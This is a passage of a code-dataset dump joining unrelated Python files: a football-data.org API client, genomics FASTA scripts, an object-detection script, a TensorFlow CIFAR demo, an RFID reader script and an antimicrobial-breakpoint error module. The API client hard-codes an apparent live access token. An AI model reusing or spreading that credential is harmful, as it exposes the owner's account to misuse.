So, change as many joins as possible\n to INNER, but don't make OUTER joins INNER if that could remove\n results from the query.\n \"\"\"\n to_promote = set()\n to_demote = set()\n for table, votes in self.votes.items():\n if self.effective_connector == 'OR' and votes < self.num_children:\n to_promote.add(table)\n if self.effective_connector == 'AND' or self.effective_connector == 'OR' and votes == self.num_children:\n to_demote.add(table)\n\n query.promote_joins(to_promote)\n query.demote_joins(to_demote)\n return to_demote","sub_path":"pycfiles/djx-0.0.4-py2-none-any/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":73909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48978567","text":"import re\nimport requests\n\n\nclass FBDataHandler:\n\n def __init__(self, league_id, season='2019', stage='REGULAR_SEASON', status='FINISHED'):\n self.baseUrl = 'https://api.football-data.org/v2/'\n self.apiToken = '065434220db543f6aafdb8565d85d359'\n self.headers = { 'X-Auth-Token': self.apiToken }\n self.league_ids = {\n 'ASL': '2024', 'BSA': '2013', 'BL' : '2002',\n 'FL1': '2015', 'PL' : '2021', 'ELC': '2016',\n 'PD' : '2014', 'SA' : '2019', 'PPL': '2017',\n 'DED': '2003', 'MLS': '2145', 'CL' : '2001',\n 'EL' : '2146'\n }\n AZ = re.search(r\"([A-Z])\\w+\", league_id)\n if AZ:\n self.league_id = self.league_ids[league_id]\n else:\n self.league_id = league_id\n self.season = season\n self.stage = stage\n self.status = status\n\n def _get(self, url, params={}):\n req = requests.get(self.baseUrl + url, headers=self.headers, params=params)\n status_code = req.status_code\n if status_code == requests.codes.ok:\n return req\n else:\n print(\"Request Error:\", status_code)\n return\n\n def get_teams(self):\n params = {'season': self.season, 'stage': self.stage}\n req = self._get('competitions/{id}/teams'.format(id=self.league_id), params=params)\n return req.json()\n\n def df_setup(self):\n print(\"Setting up dataframe...\")\n tmsReq = self.get_teams()\n tmsInit = {'attrs': {}, 'data': {}}\n for team in tmsReq['teams']:\n tmsInit['data'][team['id']] = {\n 'name': team['name'],\n 'shortName': team['shortName'],\n 'tla': team['tla'],\n 'eloRun': [1500],\n 'eloNow': 1500,\n 'fixtures': [],\n 'results': [],\n 'tablePos': 0,\n 'matches': 0,\n 'won': 0,\n 'draw': 0,\n 'lost': 0,\n 'points': 0,\n 'goalsFor': 0,\n 'goalsAga': 0,\n 'goalDiff': 0\n }\n return tmsInit\n\n def get_league_results(self):\n params = {'season': self.season, 'stage': self.stage, 'status': self.status}\n print(\"Getting league results...\")\n req = self._get('competitions/{id}/matches'.format(id=self.league_id), params=params)\n return req.json()\n\n def get_standings(self):\n params = {'season': self.season, 'stage': self.stage, 'standingType': 'TOTAL'}\n print(\"Getting league standings...\")\n req = self._get('competitions/{id}/standings'.format(id=self.league_id), params=params)\n return req.json()\n","sub_path":"app/data/FBApi.py","file_name":"FBApi.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"434101088","text":"# Goal: to save the peak files for AA cross in a fasta file in LG3\n\naafa = open('/Volumes/group_dv/group/data/sequences/fastafiles/cross-AAo/NfAAo_export_hp.fa', 'rU').read()\npeak_lg3 = ['33911', '8423', '19589', '39073', '25587', '44971', '8178', '4179', \n '32767', '26568', '26780', '2663', '36581', '12275', '34490', '39114', \n '10884', '2093', 
'6074', '18588', '32724', '32599']\n\n\n# In[3]:\n\nkfaa = [i[1:] for i in aafa.split('\\n')[:-1][:-1:2]]\nvfaa = aafa.split('\\n')[:-1][1::2]\ndfaa = dict(zip(kfaa, vfaa))\n\n\n# In[8]:\n\naalm = open('/Volumes/group_dv/personal/DValenzano/May2014/aao32014_swi_pos.csv', 'rU').read()\naalm = aalm.replace('\"','')\n\n\n# In[13]:\n\nkaa = [i.split(',')[0] for i in aalm.split('\\n')[1:-1]]\nvaa = [','.join(i.split(',')[1:]) for i in aalm.split('\\n')[1:-1]]\ndaa = dict(zip(kaa,vaa))\n\n\n# In[15]:\n\naaz = ','.join([ '>'+i+'_LG'+daa[i]+'\\n'+dfaa[i]+'\\n' for i in peak_lg3 ]).replace('\\n,','\\n')\n\n\n# In[18]:\n\nz = open('/Volumes/group_dv/personal/DValenzano/Nov2014/AA-cross/peak_lg3.fa', 'w')\nz.write(aaz)\nz.close()\n\n\n# In[ ]:\n\n\n\n","sub_path":"07-Nov-2014.py","file_name":"07-Nov-2014.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"561402385","text":"import pydarknet\nfrom pydarknet import Detector, Image\nfrom tf_pose.networks import get_graph_path\nimport cv2\nimport datetime\nfrom utils import is_moving, save_object, object_interaction\n\ndef load_pydarknet(args, logger):\n # Optional statement to configure preferred GPU. Available only in GPU version.\n pydarknet.set_cuda_device(0)\n\n #Object\n if (args.demo == 'total' or args.demo == 'objects'):\n net = Detector(bytes(args.cfg, encoding=\"utf-8\"), bytes(args.weights, encoding=\"utf-8\"), 0,\n bytes(\"cfg/coco.data\", encoding=\"utf-8\"))\n ##Pose\n logger.debug('initialization %s : %s' % (args.model, get_graph_path(args.model)))\n\n return net\n\ndef analyze_results(image, results, humans, height, width, object_list, objects, objects_detected, saved):\n count_f = 0\n\n for obj in object_list:\n vars()[obj+'s']=[]\n vars()[obj+'_mov']=False\n vars()['dist_r_'+obj]=1000\n vars()['dist_l_'+obj]=1000\n vars()[obj+'_track_time']=[]\n vars()[obj+'_track_x']=[]\n vars()[obj+'_track_y']=[]\n\n if results:\n print('objects detected')\n \n for obj in results:\n for measure in object_list:\n if (measure in str(obj)):\n vars()[measure+'_detect']=True\n vars()[measure+'s'].append(obj)\n vars()[measure+'_mov']=is_moving(vars()[measure+'s'],20)\n vars()[measure+'_index']=results.index(obj)\n vars()[measure+'_track_time'].append((datetime.now().strftime('%d/%m/%H:%M:%S')))\n vars()[measure+'_track_x'].append(obj[-1][0])\n vars()[measure+'_track_y'].append(height-obj[-1][1])\n\n for cat, score, bounds in results:\n x, y, w, h = bounds\n objects+=str((str(cat.decode(\"utf-8\")),round(score,3)))\n print(objects)\n if cat.decode(\"utf-8\")=='cup':\n if saved:\n print(saved)\n for obj in saved:\n print(obj[0])\n if ('cup' not in obj[0]):\n count=0\n save_object(cat, score, bounds)\n else:\n count+=1\n # print(saved)\n if count >=5:\n saved.remove(obj)\n else:\n save_object()\n else:\n if saved:\n count_f+=1\n if count_f >= 3:\n saved.clear()\n count_f=0\n # print(saved)\n\n #Distance from hand to object\n for human in humans:\n r_wrist = human.body_parts.get(4, None)\n l_wrist = human.body_parts.get(7, None)\n\n for obj in object_list:\n if (vars()[obj+'_detect']==True):\n if r_wrist != None :\n vars()['dist_r_'+obj]=object_interaction(results[vars()[obj+'_index']][2],r_wrist.x*width,r_wrist.y*height)\n\n if l_wrist != None :\n vars()['dist_l_'+obj]=object_interaction(results[vars()[obj+'_index']][2],l_wrist.x*width,l_wrist.y*height)\n # print( vars()['dist_r_'+obj])\n\n #Stablishing interaction\n dist_thresh=150\n for obj in object_list:\n if 
vars()[obj+'_detect']==True:\n if (vars()[obj+'_mov']==True or vars()['dist_r_'+obj]池化层\r\nW_conv1 = weight_variable([5,5,3,64])\r\nb_conv1 = bias_variable([64])\r\n\r\n\r\nh_conv1 = tf.nn.relu(conv2d(x_image,W_conv1) + b_conv1) #输出为[128,24,24,64]\r\nprint_op_shape(h_conv1)\r\nh_pool1,mask1 = max_pool_with_argmax(h_conv1,2) #输出为[128,12,12,64]\r\n#h_pool1 = max_pool_2x2(h_conv1) #输出为[128,12,12,64]\r\nprint_op_shape(h_pool1)\r\n\r\n\r\n#2.卷积层 ->池化层\r\nW_conv2 = weight_variable([5,5,64,64])\r\nb_conv2 = bias_variable([64])\r\n\r\n\r\nh_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2) + b_conv2) #输出为[128,12,12,64]\r\nprint_op_shape(h_conv2)\r\nh_pool2,mask2 = max_pool_with_argmax(h_conv2,2) #输出为[128,6,6,64]\r\n#h_pool2 = max_pool_2x2(h_conv2) #输出为[128,6,6,64]\r\nprint_op_shape(h_pool2)\r\n\r\n\r\n#3 反卷积第二层卷积结果\r\nt_conv2 = un_max_pool(h_pool2,mask2,2) \r\nprint_op_shape(t_conv2) #输出为[128,12,12,64] \r\nt_pool1 = tf.nn.conv2d_transpose(t_conv2 - b_conv2,W_conv2,output_shape=h_pool1.shape,strides=[1,1,1,1],padding='SAME')\r\nprint_op_shape(t_pool1) #输出为[128,12,12,64]\r\nt_conv1 = un_max_pool(t_pool1,mask1,2)\r\nprint_op_shape(t_conv1) #输出为[128,24,24,64] \r\nt_x_image = tf.nn.conv2d_transpose(t_conv1 - b_conv1,W_conv1,output_shape=x_image.shape,strides=[1,1,1,1],padding='SAME') #生成原始图\r\nprint_op_shape(t_x_image) #输出为[128,24,25,3]\r\n\r\n\r\n#4 反卷积第一层卷积结果\r\nt1_conv1 = un_max_pool(h_pool1,mask1,2)\r\nprint_op_shape(t1_conv1)\r\nt1_x_image = tf.nn.conv2d_transpose(t1_conv1 - b_conv1,W_conv1,output_shape=x_image.shape,strides=[1,1,1,1],padding='SAME') #生成原始图\r\nprint_op_shape(t1_x_image) \r\n\r\n\r\n#合并还原结果,并输出给TensorBoard输出\r\nstictched_decodings = tf.concat((x_image,t1_x_image,t_x_image),axis=2)\r\n#stictched_decodings = x_image\r\n#图像数据汇总,并命名为'source/cifar'\r\ndecoding_summary_op = tf.summary.image('source/cifar',stictched_decodings)\r\n\r\n#5.卷积层 ->全局平均池化层\r\nW_conv3 = weight_variable([5,5,64,10])\r\nb_conv3 = bias_variable([10])\r\n\r\nh_conv3 = tf.nn.relu(conv2d(h_pool2,W_conv3) + b_conv3) #输出为[-1,6,6,10]\r\nprint_op_shape(h_conv3)\r\n\r\nnt_hpool3 = avg_pool_6x6(h_conv3) #输出为[-1,1,1,10]\r\nprint_op_shape(nt_hpool3)\r\nnt_hpool3_flat = tf.reshape(nt_hpool3,[-1,10]) \r\n\r\ny_conv = tf.nn.softmax(nt_hpool3_flat)\r\n\r\n\r\n'''\r\n三 定义求解器\r\n'''\r\n\r\n#softmax交叉熵代价函数\r\ncost = tf.reduce_mean(-tf.reduce_sum(input_y * tf.log(y_conv),axis=1)) \r\n\r\n#求解器\r\ntrain = tf.train.AdamOptimizer(learning_rate).minimize(cost)\r\n\r\n#返回一个准确度的数据\r\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1),tf.argmax(input_y,1))\r\n#准确率\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,dtype=tf.float32))\r\n\r\n'''\r\n四 开始训练\r\n'''\r\nsess = tf.Session()\r\nsess.run(tf.global_variables_initializer())\r\n#创建summary_write,用于写文件\r\nsummary_writer = tf.summary.FileWriter('./log',sess.graph)\r\n \r\n# 启动计算图中所有的队列线程 调用tf.train.start_queue_runners来将文件名填充到队列,否则read操作会被阻塞到文件名队列中有值为止。\r\ntf.train.start_queue_runners(sess=sess)\r\n\r\nfor step in range(training_step):\r\n \r\n #获取batch_size大小数据集\r\n image_batch,label_batch = sess.run([images_train,labels_train])\r\n \r\n #one hot编码\r\n label_b = np.eye(10,dtype=np.float32)[label_batch]\r\n \r\n #开始训练\r\n train.run(feed_dict={input_x:image_batch,input_y:label_b},session=sess)\r\n \r\n if step % display_step == 0:\r\n train_accuracy = accuracy.eval(feed_dict={input_x:image_batch,input_y:label_b},session=sess)\r\n print('Step {0} tranining accuracy {1}'.format(step,train_accuracy))\r\n\r\n\r\n'''\r\n五 开始测试\r\n'''\r\nimage_batch, label_batch = sess.run([images_test, 
labels_test])\r\nlabel_b = np.eye(10,dtype=float)[label_batch]\r\nprint (\"finished! test accuracy %g\"%accuracy.eval(feed_dict={\r\n input_x:image_batch, input_y: label_b},session=sess))\r\n \r\n'''\r\n六 写summary日志\r\n'''\r\n#生成summary\r\ndecoding_summary = sess.run(decoding_summary_op,feed_dict={input_x:image_batch, input_y: label_b})\r\n#将summary写入文件\r\nsummary_writer.add_summary(decoding_summary)\r\n","sub_path":"8-17cifar反卷积_2.py","file_name":"8-17cifar反卷积_2.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519291978","text":"#!/usr/bin/env python\n\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# Mark T. Smith 2016\n#\n\n\n#\n# The s6350_iso_transponder_details program returns data from a\n# single ISO15693 tag in the RFID reader field. It essentially\n# does an inventory with only 1 time slot, so only 1 tag can be\n# found. The following data from the tag can be returned.\n#\n# Transponder ID\n# The Data Storage Format Identifier (DSFID)\n#\n# See TI 6350 user manual and the ISO 15693-3 document for more information.\n#\n\nimport io\nimport sys\nimport serial\n\n#\n# Check that there is at least one argument which hopefully will be\n# the serial port ID that is to be used.\n#\n\nif len(sys.argv) < 2 :\n print (\"Usage: \" + sys.argv[0] + \" serial_port_to_use\")\n sys.exit()\n\n\n#\n# The TI reader defaults to 57600 baud, 8 bit data, 1 stop bit and no parity.\n# There is no handshaking.\n#\n# Note that the timeout here is set to 5 seconds. That is more than enough\n# time to allow the TI RFID reader to turn on its radio, command a tag, and get\n# data back from it. We assume that if we time out and we don't have any data\n# then the RFID reader is not on line.\n#\n\ntry:\n tiser = serial.Serial(sys.argv[1], baudrate=57600, bytesize=8,\n parity='N', stopbits=1, timeout=5, xonxoff=0, rtscts=0, dsrdtr=0)\nexcept:\n print (\"Usage: \" + sys.argv[0] + \" serial_port_to_use\")\n print (\"Can't open \" + sys.argv[1] + \".\")\n print (\"Under linux or Apple OS you need the full path, ie /dev/ttyUSB0.\")\n print (\"Under windows use the communication port name, ie COM8\")\n sys.exit()\n\n#\n# Form an ISO read transponder details command with a slot length of 1.\n# To use the write() method in python it needs to be in the form of a\n# string or a buffer, which is just a pointer into memory. This code\n# forms an array of bytes from a list that contains the command to send\n# and then uses a buffer (memoryview) to write it out.\n#\n# Note that the S6350 reader uses a wrapper that encapsulates all\n# ISO commands. Every ISO commands needs to have this wrapper with\n# the S6350 reader. For some commands the entire length is not\n# known ahead of time, so some pieces are filled in later and the\n# checksum bytes generated last and filled in. 
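The fill-in-later pattern those comments describe, build the body, patch the length byte, then append the XOR checksum pair, as one standalone helper. The wrapper bytes below are the ones quoted in the surrounding code, but treat this as an illustrative sketch rather than a verified S6350 frame builder; it also assumes frames shorter than 256 bytes, so only the length LSB is set.

def finish_frame(body):
    frame = bytearray(body) + bytearray(2)   # reserve the two checksum slots
    frame[1] = len(frame)                    # length LSB, as in the code below
    chk = 0
    for b in frame[:-2]:                     # XOR of everything before the pair
        chk ^= b
    frame[-2], frame[-1] = chk, chk ^ 0xFF   # checksum and its ones complement
    return frame

frame = finish_frame([0x01, 0, 0, 0, 0, 0, 0x60, 0x11, 0x27, 0x01, 0])
assert len(frame) == 13 and frame[-2] ^ frame[-1] == 0xFF

The receive side mirrors this: XOR all returned bytes except the final pair and compare against the first checksum byte, which is exactly what the verification loop later in this program does.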
Although this command\n# can be completely known in advance, this code shows how to do it for\n# other ISO commands where things need to be filled in later, such as\n# specific UIDs or data to be written into a tag.\n#\n# In this wrapper, the bytes are as follows:\n#\n# 0: SOF\n# 1 & 2: length LSB and MSB respectively, filled in later\n# 3 & 4: TI reader address fields, alsways set to 0\n# 5: TI reader command flags\n# 6: TI reader ISO pass thru command, always 0x60\n#\n\nread_transponder_details = [0x01, 0, 0, 0, 0, 0, 0x60] # the ISO wrapper\n\n#\n# Extend the list with the actual ISO command without the SOF, CRC16 and EOF\n# The bytes that extend the list are as follows:\n#\n# 7: ISO reader config byte 0.The value in this case is 0x11\n# 8: Tag flags. In this case indicating 1 time slot (0x27)\n# 9: The ISO command. In this case 0x01\n# 10: The mask length for doing the inventory. In this case it is 0\n#\n\nread_transponder_details.extend([0x11, 0x27, 0x01, 0])\n\n#\n# Extend the list 1 more time with places for the checksum bytes.\n# Those will be computed and added later to the resulting byte array\n# that is formed to send to the reader.\n#\n\nread_transponder_details.extend([0, 0]) # the two checksum bytes\n\n#\n# Now that the list containing the command template is done, it is\n# possible to know the length of the command and create the byte array.\n#\n\ncommand_len = len(read_transponder_details)\ncommand = bytearray(command_len)\nidx = 0\n\nfor i in read_transponder_details:\n command[idx] = i\n idx += 1\n\n# Fill in the length\n\ncommand[1] = command_len\n\n# Compute and fill in the two checksum bytes\n\nchksum = 0\nidx = 0\nwhile idx < (command_len - 2):\n chksum ^= command[idx]\n idx += 1\n\ncommand[command_len - 2] = chksum # 1st byte is the checksum\ncommand[command_len - 1] = chksum ^ 0xff # 2nd byte is ones comp of the checksum\n\n# Send out the command to the reader\n\nx_str = raw_input (\"Enter any string to get ISO transponder details: \")\ntiser.write(memoryview(command)) # memoryview is the same as buffer\n\n#\n# We read the returned data from the reader in 2 passes. First we read\n# the first two bytes. The second byte is the length of the entire returned\n# packet. From that we determine how many more bytes to read which are then\n# read in the second pass.\n#\n\nline_size = tiser.read(2) # first pass, read first two bytes of reply\n\nif len(line_size) < 2:\n print (\"No data returned. Is the reader turned on?\")\n tiser.close()\n sys.exit()\n\n# second pass\n# print (\"Reply length is \" + str(ord(line_size[1])) + \" bytes.\")\nline_data = tiser.read((ord(line_size[1]) - 2)) # get the rest of the reply\n# print (\"I read \" + str(len(line_data)) + \" bytes.\")\n\n#\n# The returned data is in the form of string objects. Use that data to form\n# a single response list of integers. Integers are exactly what the RFID reader\n# is sending back. Doing this makes it easier to process the returned data.\n#\n\nresponse_len = ord(line_size[1]) # this is the length of the entire response\nresponse = []\nidx = 0\n\nresponse.append(ord(line_size[0])) # response SOF\nresponse.append(ord(line_size[1])) # response size\n# In the next line the -2 accounts for the SOF and size bytes done above.\nwhile idx < (response_len - 2): # do the rest of the response\n response.append(ord(line_data[idx]))\n idx += 1\n\n#\n# Compute the checksum. 
To compute the checksum of the returned data you just\n# take the XOR of all the data bytes that were returned and compare with the checksum\n# bytes that were returned.\n#\n# The 'while' statment ranges from 0 to the length of the returned data - 2. The\n# minus 2 is to adjust for the index (we number from 0) and also so that we do not\n# include the returned last checksum bytes in our own calculation. We compute the\n# checksum on the returned data bytes, but not including the returned checksum bytes.\n#\n\nchksum = 0\nidx = 0\nwhile idx < (response_len - 2):\n chksum ^= response[idx]\n idx += 1\n\n#\n# Compare the checksums and if they don't match then bail out.\n# If they do match then all is well and all that remains is to\n# dig out and print the tag data.\n#\n\nif chksum != (response[response_len - 2]): # and compare them\n print(\"Checksum error!\")\n# print (chksum)\n# print (response[response_len - 2])\n tiser.close()\n sys.exit()\n\n\n\nif response[7] == 0x01:\n print(\"Transponder ID: \" + \"0x%0.2X\" % response[20] + \"%0.2X\" % response[19]\n + \"%0.2X\" % response[18] + \"%0.2X\" % response[17]\n + \"%0.2X\" % response[16] + \"%0.2X\" % response[15]\n + \"%0.2X\" % response[14] + \"%0.2X\" % response[13])\n\n print(\"DSFID: \" + \"0x%0.2X\" % response[12])\n\nelse:\n print(\"RFID tag not read.\")\n\ntiser.close()\n","sub_path":"RFID_Project/IS2500_software/IS2500_software/python/iso/s6350_iso_transponder_details.py","file_name":"s6350_iso_transponder_details.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350577505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 23 14:25:50 2014\n\n@author: nhpnp3\n\"\"\"\n\nimport time\nimport numpy as np\nimport os\nimport functions_polycrystal as rr\n\ndef fe_grab(ns, set_id, newdir, wrt_file):\n\n ## el is the # of elements per side of the cube \n el = 21 \n \n ### FINITE ELEMENT RESPONSES ###\n\n ## change to directory with the .vtk files \n# cwd = os.getcwd()\n## os.chdir(cwd + '\\\\' + newdir)\n# os.chdir(cwd + '/' + newdir) #for unix \n# \n# [r_real_all, msg] = rr.load_fe('orientation_%s%s.mat' %(ns, set_id),set_id,ns,el)\n# \n# ## return to the original directory\n# os.chdir('..') \n# \n r_real_all = np.random.random([el,el,el,ns,6])\n \n start = time.time() \n \n for comp in xrange(6): \n \n np.save('r%s_%s%s' %(comp,ns,set_id), r_real_all[:,:,:,comp,:]) \n# rr.WP(msg,wrt_file)\n \n ## responses in frequency space\n \n r_fft = np.fft.fftn(r_real_all[:,:,:,comp,:], axes = [0,1,2]) \n np.save('r%s_fft_%s%s' %(comp,ns,set_id),r_fft) \n \n end = time.time()\n timeE = np.round((end - start),3)\n \n msg = 'Convert FE results to frequency space: %s seconds' %timeE\n rr.WP(msg,wrt_file)\n \nif __name__ == '__main__':\n fe_grab(200, 'test', 'blarg', 'blargy.txt')","sub_path":"fip_collab/2014_09_16_stress_colony_mks/2014_09_25_LE_stress_mks/fe_grab_test.py","file_name":"fe_grab_test.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221587897","text":"import model_core\r\n\r\n#Class model_parameter_set is the object that stores all associated model parameters.\r\n#Each instance of disk_fitter has an object of class model_parameter_set stored\r\n#as its \"current model\", and any time fitting occurs, it updates the object\r\n#attributes, all of which are listed below.\r\n#The model_parameter_set object in turn contains an object of 
class mgm (described\r\n#in model_core.py) as one of ITS attributes, and this mgm object and its\r\n#routines will do the actual fitting.\r\n#The reason for this design is so that if we ever add other fitting algorithms, we can\r\n#trade out different \"model_engines\" to handle each type of fitting algorithm.\r\n#The functions that update the error tables belong to class model_parameter_set.\r\nclass model_parameter_set():\r\n\r\n def __init__(self):\r\n self.current_dataset = {'mics':None, 'disks':None}\r\n self.model_type = 'mgm'\r\n #These cutoffs are either specified by the user (if they so indicate by checking the appropriate boxes)\r\n #OR determined by model fitting, which is done by the model_engine object below.\r\n self.ycutoffS = 4.0\r\n self.ycutoffR = 16.0\r\n self.xcutoffS = 32.0\r\n self.xcutoffR = 12.0\r\n self.model_engine = model_core.mgm()\r\n self.strain_name = 'Acinetobacter baumannii'\r\n #If this is checked, use the user's defined cutoffs.\r\n self.use_user_defined_disk_cutoffs = False\r\n #This one is extremely important -- if it's true, we don't need\r\n #to fit a model, because the ycutoffs and xcutoffs are defined to be the same\r\n #by microbiologists for MIC data, so the data handling will be very different.\r\n self.mic_vs_mic = False\r\n #The error counts in the final export table distinguish between what FDA considers 'very major' and 'major errors'.\r\n self.error_counts = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n\r\n #Microbiologists also distinguish between error types that occur in certain bands.\r\n #Hence the following dictionaries. The precise definition of these bands is a little complicated\r\n #and will be discussed further under the comments in the error update functions below.\r\n self.i_plus2_error = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n self.i_plus1_minus1_error = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n self.i_minus2_error = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n\r\n #Microbiologists define essential and categorical agreement for MIC vs MIC data only, so\r\n #IF we are dealing with MIC vs MIC data, we'll update these object attributes.\r\n self.essential_agreement = 0\r\n self.categorical_agreement = 0\r\n\r\n #color scheme for the plot.\r\n self.colormap_type = 'christmas_colors'\r\n\r\n #loads the user's specified csv file and does some basic error handling.\r\n #I didn't use Pandas because when freezing a python app to an exe, pandas\r\n #just adds a chunk to the memory footprint, and we don't really need to do\r\n #anything fancy that might require pandas here.\r\n def load_dataset(self, filename):\r\n error = False\r\n self.current_dataset = {'mics':[], 'disks':[]}\r\n with open(filename) as input_filehandle:\r\n for line in input_filehandle:\r\n try:\r\n current_values = line.strip().split(',')\r\n self.current_dataset['mics'].append(float(current_values[0]))\r\n self.current_dataset['disks'].append(float(current_values[1]))\r\n except:\r\n error = True\r\n if len(current_values) > 2:\r\n error = True\r\n if error == True or len(self.current_dataset['mics']) != len(self.current_dataset['disks']):\r\n #Make sure if there was an error loading the file to zero out self.current_dataset. 
That way,\r\n #other modules will be able to determine that no data has been loaded and do error handling\r\n #accordingly.\r\n self.current_dataset = {'mics':None, 'disks':None}\r\n return ('There was an error opening the selected file! Clearly you have made a mistake. '\r\n 'One reason why this may have occurred '\r\n 'is if you selected a non-csv file or a file with more than two columns. '\r\n 'Remember your instructions!')\r\n else:\r\n return '0'\r\n\r\n\r\n\r\n #This function updates the model_parameter_set error dictionaries by first zeroing them out,\r\n #then calling either update_error_for_disk_data or update_error_for_mic_vs_mic_data,\r\n #depending on which option the user checked.\r\n def update_error_tables(self, is_mic_vs_mic=False):\r\n try:\r\n self.ycutoffR = float(self.ycutoffR)\r\n self.ycutoffS = float(self.ycutoffS)\r\n self.xcutoffR = float(self.xcutoffR)\r\n self.xcutoffS = float(self.xcutoffS)\r\n except:\r\n return 'Non-numeric cutoff entered!'\r\n self.error_counts = {'num_strains':len(self.current_dataset['mics']),\r\n 'very major errors':0, 'major errors':0, 'minor errors':0}\r\n self.i_plus2_error = {'num_strains':0,'very major errors':0, 'major errors':0, 'minor errors':0}\r\n self.i_plus1_minus1_error = {'num_strains':0,'very major errors':0, 'major errors':0, 'minor errors':0}\r\n self.i_minus2_error = {'num_strains':0,'very major errors':0, 'major errors':0, 'minor errors':0}\r\n \r\n \r\n if is_mic_vs_mic == False:\r\n self.update_error_for_disk_data()\r\n else:\r\n self.update_error_for_mic_vs_mic_data()\r\n return '0'\r\n\r\n\r\n\r\n def update_error_for_disk_data(self):\r\n diskvalue = self.current_dataset['disks']\r\n micvalue = self.current_dataset['mics']\r\n for i in range(len(self.current_dataset['mics'])):\r\n #Assign predictions and actual values to categories\r\n if micvalue[i] <= self.ycutoffS:\r\n actual_category = 0\r\n elif micvalue[i] < self.ycutoffR:\r\n actual_category = 1\r\n else:\r\n actual_category = 2\r\n\r\n if diskvalue[i] >= self.xcutoffS:\r\n predicted_category = 0\r\n elif diskvalue[i] > self.xcutoffR:\r\n predicted_category = 1\r\n else:\r\n predicted_category = 2\r\n\r\n #This next part is a little subtle. Microbiologists when reviewing disk vs mic data like\r\n #to see how many of the errors (where predicted != actual) fall into \">=I+2\", \"I+1 to I-1\"\r\n #and \"<=I-2\". I+x in this case is defined as +x bins. So for example if the cutoff is 16\r\n #then I is MIC < 16, I+1 is MIC <= 16 and I+2 is MIC <=32. I had to double-check with our\r\n #microbio team the first time I implemented this because the way they were using these\r\n #\"I+2\", \"I+1 to I-1\" etc. categories was initially unclear to me. 
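            #With the defaults set in __init__ (ycutoffS = 4, ycutoffR = 16) the
            #bands below work out to: \">=I+2\" is MIC > 16, \"I+1 to I-1\" is
            #4 <= MIC <= 16, and \"<=I-2\" is MIC < 4.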
At any rate, the next set of\r\n #if-else statements implements their logic to determine errors in the corresponding categories.\r\n if micvalue[i] > (self.ycutoffR):\r\n self.i_plus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus2_error[error_code] += 1\r\n elif micvalue[i] <= self.ycutoffR and micvalue[i] >= self.ycutoffS:\r\n self.i_plus1_minus1_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus1_minus1_error[error_code] += 1\r\n else:\r\n self.i_minus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_minus2_error[error_code] += 1\r\n #We now update the overall whole-dataset error counts. An error is any situation where\r\n #predicted != actual. Microbiologists define \"very major\", \"major\" and \"minor\" errors\r\n #depending on how predicted compares to actual (implemented in check_is_error below).\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.error_counts[error_code] += 1\r\n\r\n\r\n\r\n\r\n def update_error_for_mic_vs_mic_data(self):\r\n self.essential_agreement = 0\r\n self.categorical_agreement = 0\r\n num_wrong_predictions = 0\r\n num_predictions_within_twofold = 0\r\n #If the user imported MIC vs MIC data, the procedure is the same but the direction of the inequality\r\n #for x values (what we're calling 'diskvalue' here for the sake of consistency) is reversed.\r\n xvalue = self.current_dataset['disks']\r\n micvalue = self.current_dataset['mics']\r\n for i in range(len(self.current_dataset['mics'])):\r\n if micvalue[i] <= self.ycutoffS:\r\n actual_category = 0\r\n elif micvalue[i] < self.ycutoffR:\r\n actual_category = 1\r\n else:\r\n actual_category = 2\r\n\r\n if xvalue[i] >= self.xcutoffR:\r\n predicted_category = 2\r\n elif xvalue[i] > self.xcutoffS:\r\n predicted_category = 1\r\n else:\r\n predicted_category = 0\r\n\r\n\r\n #Same applies as for the analogous section under update_error_for_disk_data above\r\n #(see the long comment under that function to explain what we're doing in this next\r\n #group of if-else statements).\r\n if micvalue[i] > (self.ycutoffR):\r\n self.i_plus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus2_error[error_code] += 1\r\n elif micvalue[i] <= self.ycutoffR and micvalue[i] >= self.ycutoffS:\r\n self.i_plus1_minus1_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus1_minus1_error[error_code] += 1\r\n else:\r\n self.i_minus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_minus2_error[error_code] += 